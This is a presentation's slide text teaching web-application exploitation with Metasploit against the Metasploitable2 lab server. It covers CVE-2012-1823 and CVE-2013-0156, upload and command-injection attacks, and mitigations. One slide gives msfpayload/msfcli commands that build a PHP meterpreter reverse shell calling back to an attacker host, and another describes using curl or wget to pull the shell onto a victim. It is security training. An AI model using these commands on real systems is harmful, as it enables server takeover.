290 likes | 592 Vues
Dennis Maldonado. @DennisMald. Introduction to Metasploit: Exploiting Web Applications. Dennis Maldonado. Application Security Specialist WhiteHat Security Full-Time Student University of Houston – Main Campus Computer Information Systems Major Twitter @DennisMald Website / Blog
E N D
Dennis Maldonado @DennisMald Introduction to Metasploit:Exploiting Web Applications
Dennis Maldonado • Application Security Specialist • WhiteHat Security • Full-Time Student • University of Houston – Main Campus • Computer Information Systems Major • Twitter • @DennisMald • Website / Blog • KernelMeltdown.org
Tools • Kali Linux – Our attacker machine • Metasploit Framework – Used for exploiting, generating the payload, and establishing a session with our victim. • Metasploitable2 – Victim Web Server
Topic of the day Exploiting the backend server through a web application.
What’s the problem? • Reasons why hackers want to compromise the server: • Run attacks against the internal network • Use the server as a bot • Install backdoors onto the server • Reveal sensitive files/passwords • Execute any local file • Execute remote files • and more…
What’s the problem? • Vulnerabilities that are dangerous against a server • Directory Traversal • Local File Inclusion • Remote File Inclusion • Remote Code Execution • SQL Injection • Command Injection
Directory Traversal http://website.com/?page=index.php
Local File Inclusion http://website.com/?page=index.php
Remote File Inclusion http://website.com/?page=index.php
Remote Code Execution http://website.com/
SQL Injection http://website.com/user.php?id=1&Submit=Submit#
The Metasploit Project • Metasploit is an open-source framework used for Security development and testing • Information gathering and fingerprinting • Exploitation/Penetration testing • Payload generation and encoding • Fuzzing • And much more…
Metasploit Interfaces • Command Line Interfaces • msfconsole • msfcli • GUI Interfaces • Metasploit Community Edition • Armitage
Metasploit Modules • Modules • Exploit – Exploitation/Proof-of-Concept code • Ruby on Rails exploit • PHP-CGI exploit • Auxiliary – Misc. modules for multiple purposes • Scanners • DDOS tools • Fingerprinting • Clients • Payloads – Code to be executed on the exploited system • System Shells • Meterpreter Shells • Post – Modules for post-exploitation tasks • Persistence • Password Stealing • Pivoting
Exploits • Active Exploits • Actively exploit a host. • Ex: Ruby on Rails XML exploit • Passive Exploits • Wait’s for incoming hosts, then exploits them • Ex: Java 0-days • Exploits contain payloads
Payloads • Inline (Non Staged) • Payload containing the exploit and shell code • Stable • Large size • Staged • Exploits victim, establishes connection with attacker, pulls down the payload • Meterpreter • Advanced, dynamic payload. • Extended over the network • Extensible through modules and plugins
Payloads continued • Types of connections • Bind • Local server gets started on victim machine • Attacker connects to victim • windows/x64/shell/bind_tcp • Reverse • Local server gets started on attacker machine • Victim connects to attacker • windows/x64/shell/reverse_tcp
PHP-CGI Argument Injection • CVE 2012-1823 • DOS attack • -T 10000 • Source code disclosure • -s argument • Remote Code Execution • -d argument
Ruby on Rails XML Parameter Parsing Vulnerability • CVE-2013-0156 • Easy to find, easy to exploit, critical vulnerability. • Requires just one POST request containing a specially crafted XML data. • Send commands through YAML objects
Unrestricted File Upload • The upload functionality allows for any file type to be uploaded • Upload server-side code and check if it executes • PHP = <?php echo “Hello World!”; ?> • ASP = <% Response.Write"Hello World!" %> • JSP = <%= new java.util.Date().toString() %> • Use msfpayload to create a shell • Use msfcli to listen for a connection from the victim • Upload the shell and execute it
Command Injection • Allows an attacker to execute system level commands. • Attempt a safe command • echo test • uname -a • Use msfpayload to create a shell • Use msfcli to listen for a connection from the victim • Inject curlor wgetcommands to download the shell onto the victim machine. • Chmod if necessary and execute
Commands used(Note, IP addresses and ports may be different) • msfpayloadphp/meterpreter/reverse_tcp O • msfpayloadphp/meterpreter/reverse_tcp LHOST=10.211.55.3 LPORT=1337 O • msfpayloadphp/meterpreter/reverse_tcp LHOST=10.211.55.3 LPORT=1337 R > shell.php • # Now edit the shell.php file to remove the comment on the first line and add "?>" at the end of the file. • ================================== • msfcli multi/handler payload=php/meterpreter/reverse_tcplhost=10.211.55.3 lport=1337 E
Mitigations • Keep software up to date! • PHP: 5.4.3, 5.3.13 • Ruby on Rails: 3.2.11, 3.1.10, 3.0.19, 2.3.15 • Use whitelisting for file upload extensions • Watch for extensions and content-types • Don’t let upload directory be executable • Rename files if possible • Don’t pass user input as a system command! • Use library calls when possible • Sanitize input
Sources • BackTrack-Linux • http://www.kali.org/ • The Metasploit Project • http://www.metasploit.com/ • Metasploit Unleashed • http://www.offensive-security.com/metasploit-unleashed/ • PHP-CGI Advisory • http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/ • Ruby on Rails Exploitation • https://community.rapid7.com/community/metasploit/blog/2013/01/10/exploiting-ruby-on-rails-with-metasploit-cve-2013-0156 • Damn Vulnerable Web Application (DVWA) • http://www.dvwa.co.uk/ • Metasploitable 2 • http://information.rapid7.com/download-metasploitable.html?LS=1631875&CS=web